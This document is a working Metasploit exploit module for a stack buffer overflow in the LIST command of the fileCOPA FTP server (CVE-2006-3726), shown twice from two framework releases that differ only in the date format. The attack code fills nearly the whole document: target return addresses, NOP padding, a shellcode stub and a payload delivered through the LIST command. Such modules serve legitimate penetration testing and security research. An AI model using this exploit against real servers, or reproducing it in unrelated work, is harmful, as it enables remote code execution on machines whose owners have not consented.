==> metasploit-framework_4.16.32.orig.tar.gz: metasploit-framework-4.16.32/modules/exploits/windows/ftp/filecopa_list_overflow.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FileCopa FTP Server Pre 18 Jul Version',
      'Description'    => %q{
          This module exploits the buffer overflow found in the LIST command
        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
      },
      'Author'         => [ 'Jacopo Cervini' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-3726' ],
          [ 'OSVDB', '27389' ],
          [ 'BID', '19065' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',

      'Targets'        =>
        [
          [ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
          [ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
        ],
      'DisclosureDate' => 'Jul 19 2006',
      'DefaultTarget' => 0))
  end


  def exploit
    c = connect_login
    return if not c

    print_status("Trying target #{target.name}...")

    sploit =  "A "
    sploit << make_nops(target['Nops'])
    sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded

    send_cmd( ['LIST', sploit] , false)

    handler
    disconnect
  end
end

==> metasploit-framework_6.1.27.orig.tar.gz: metasploit-framework-6.1.27/modules/exploits/windows/ftp/filecopa_list_overflow.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FileCopa FTP Server Pre 18 Jul Version',
      'Description'    => %q{
          This module exploits the buffer overflow found in the LIST command
        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
      },
      'Author'         => [ 'Jacopo Cervini' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-3726' ],
          [ 'OSVDB', '27389' ],
          [ 'BID', '19065' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',

      'Targets'        =>
        [
          [ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
          [ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
        ],
      'DisclosureDate' => '2006-07-19',
      'DefaultTarget' => 0))
  end


  def exploit
    c = connect_login
    return if not c

    print_status("Trying target #{target.name}...")

    sploit =  "A "
    sploit << make_nops(target['Nops'])
    sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded

    send_cmd( ['LIST', sploit] , false)

    handler
    disconnect
  end
end
